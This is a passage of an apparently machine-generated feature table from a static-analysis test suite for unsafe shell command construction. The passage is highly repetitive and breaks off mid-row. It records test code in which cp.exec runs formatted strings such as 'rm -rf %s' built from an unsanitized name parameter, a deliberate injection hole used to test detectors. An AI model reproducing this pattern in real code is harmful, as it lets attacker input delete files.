Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:106:15:106:20 | format | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:106:15:106:20 | format | enclosingFunctionBody | name cp exec util format rm -rf %s name cp exec util format rm -rf '%s' name cp exec util format rm -rf '/foo/bar/%s' name cp exec util format %s foo/bar name cp exec util format for foo in (%s) do bar end name cp exec require printf rm -rf %s name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:106:15:106:20 | format | enclosingFunctionName | format | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:106:15:106:20 | format | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:106:22:106:49 | "for fo ... ar end" | CalleeFlexibleAccessPath | util.format | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:106:22:106:49 | "for fo ... ar end" | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:106:22:106:49 | "for fo ... ar end" | calleeImports | util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:106:22:106:49 | "for fo ... ar end" | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:106:22:106:49 | "for fo ... ar end" | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:106:22:106:49 | "for fo ... ar end" | enclosingFunctionBody | name cp exec util format rm -rf %s name cp exec util format rm -rf '%s' name cp exec util format rm -rf '/foo/bar/%s' name cp exec util format %s foo/bar name cp exec util format for foo in (%s) do bar end name cp exec require printf rm -rf %s name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:106:22:106:49 | "for fo ... ar end" | enclosingFunctionName | format | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:106:22:106:49 | "for fo ... ar end" | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:106:22:106:49 | "for fo ... ar end" | receiverName | util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:106:52:106:55 | name | CalleeFlexibleAccessPath | util.format | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:106:52:106:55 | name | InputArgumentIndex | 1 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:106:52:106:55 | name | calleeImports | util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:106:52:106:55 | name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:106:52:106:55 | name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:106:52:106:55 | name | enclosingFunctionBody | name cp exec util format rm -rf %s name cp exec util format rm -rf '%s' name cp exec util format rm -rf '/foo/bar/%s' name cp exec util format %s foo/bar name cp exec util format for foo in (%s) do bar end name cp exec require printf rm -rf %s name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:106:52:106:55 | name | enclosingFunctionName | format | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:106:52:106:55 | name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:106:52:106:55 | name | receiverName | util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:108:2:108:3 | cp | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:108:2:108:3 | cp | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:108:2:108:3 | cp | enclosingFunctionBody | name cp exec util format rm -rf %s name cp exec util format rm -rf '%s' name cp exec util format rm -rf '/foo/bar/%s' name cp exec util format %s foo/bar name cp exec util format for foo in (%s) do bar end name cp exec require printf rm -rf %s name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:108:2:108:3 | cp | enclosingFunctionName | format | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:108:2:108:3 | cp | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:108:2:108:8 | cp.exec | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:108:2:108:8 | cp.exec | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:108:2:108:8 | cp.exec | enclosingFunctionBody | name cp exec util format rm -rf %s name cp exec util format rm -rf '%s' name cp exec util format rm -rf '/foo/bar/%s' name cp exec util format %s foo/bar name cp exec util format for foo in (%s) do bar end name cp exec require printf rm -rf %s name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:108:2:108:8 | cp.exec | enclosingFunctionName | format | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:108:2:108:8 | cp.exec | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:108:2:108:46 | cp.exec ... name)) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:108:2:108:46 | cp.exec ... name)) | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:108:2:108:46 | cp.exec ... name)) | enclosingFunctionBody | name cp exec util format rm -rf %s name cp exec util format rm -rf '%s' name cp exec util format rm -rf '/foo/bar/%s' name cp exec util format %s foo/bar name cp exec util format for foo in (%s) do bar end name cp exec require printf rm -rf %s name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:108:2:108:46 | cp.exec ... name)) | enclosingFunctionName | format | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:108:2:108:46 | cp.exec ... name)) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:108:2:108:46 | exceptional return of cp.exec ... name)) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:108:2:108:46 | exceptional return of cp.exec ... name)) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:108:2:108:46 | exceptional return of cp.exec ... name)) | enclosingFunctionBody | name cp exec util format rm -rf %s name cp exec util format rm -rf '%s' name cp exec util format rm -rf '/foo/bar/%s' name cp exec util format %s foo/bar name cp exec util format for foo in (%s) do bar end name cp exec require printf rm -rf %s name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:108:2:108:46 | exceptional return of cp.exec ... name)) | enclosingFunctionName | format | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:108:2:108:46 | exceptional return of cp.exec ... name)) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:108:5:108:8 | exec | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:108:5:108:8 | exec | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:108:5:108:8 | exec | enclosingFunctionBody | name cp exec util format rm -rf %s name cp exec util format rm -rf '%s' name cp exec util format rm -rf '/foo/bar/%s' name cp exec util format %s foo/bar name cp exec util format for foo in (%s) do bar end name cp exec require printf rm -rf %s name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:108:5:108:8 | exec | enclosingFunctionName | format | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:108:5:108:8 | exec | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:108:10:108:16 | require | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:108:10:108:16 | require | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:108:10:108:16 | require | enclosingFunctionBody | name cp exec util format rm -rf %s name cp exec util format rm -rf '%s' name cp exec util format rm -rf '/foo/bar/%s' name cp exec util format %s foo/bar name cp exec util format for foo in (%s) do bar end name cp exec require printf rm -rf %s name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:108:10:108:16 | require | enclosingFunctionName | format | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:108:10:108:16 | require | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:108:10:108:26 | exceptional return of require("printf") | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:108:10:108:26 | exceptional return of require("printf") | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:108:10:108:26 | exceptional return of require("printf") | enclosingFunctionBody | name cp exec util format rm -rf %s name cp exec util format rm -rf '%s' name cp exec util format rm -rf '/foo/bar/%s' name cp exec util format %s foo/bar name cp exec util format for foo in (%s) do bar end name cp exec require printf rm -rf %s name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:108:10:108:26 | exceptional return of require("printf") | enclosingFunctionName | format | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:108:10:108:26 | exceptional return of require("printf") | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:108:10:108:26 | require("printf") | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:108:10:108:26 | require("printf") | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:108:10:108:26 | require("printf") | enclosingFunctionBody | name cp exec util format rm -rf %s name cp exec util format rm -rf '%s' name cp exec util format rm -rf '/foo/bar/%s' name cp exec util format %s foo/bar name cp exec util format for foo in (%s) do bar end name cp exec require printf rm -rf %s name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:108:10:108:26 | require("printf") | enclosingFunctionName | format | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:108:10:108:26 | require("printf") | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:108:10:108:45 | exceptional return of require ... , name) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:108:10:108:45 | exceptional return of require ... , name) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:108:10:108:45 | exceptional return of require ... , name) | enclosingFunctionBody | name cp exec util format rm -rf %s name cp exec util format rm -rf '%s' name cp exec util format rm -rf '/foo/bar/%s' name cp exec util format %s foo/bar name cp exec util format for foo in (%s) do bar end name cp exec require printf rm -rf %s name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:108:10:108:45 | exceptional return of require ... , name) | enclosingFunctionName | format | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:108:10:108:45 | exceptional return of require ... , name) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:108:10:108:45 | require ... , name) | CalleeFlexibleAccessPath | cp.exec | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:108:10:108:45 | require ... , name) | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:108:10:108:45 | require ... , name) | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:108:10:108:45 | require ... , name) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:108:10:108:45 | require ... , name) | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:108:10:108:45 | require ... , name) | enclosingFunctionBody | name cp exec util format rm -rf %s name cp exec util format rm -rf '%s' name cp exec util format rm -rf '/foo/bar/%s' name cp exec util format %s foo/bar name cp exec util format for foo in (%s) do bar end name cp exec require printf rm -rf %s name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:108:10:108:45 | require ... , name) | enclosingFunctionName | format | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:108:10:108:45 | require ... , name) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:108:10:108:45 | require ... , name) | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:108:18:108:25 | "printf" | CalleeFlexibleAccessPath | require | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:108:18:108:25 | "printf" | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:108:18:108:25 | "printf" | calleeImports | | +| 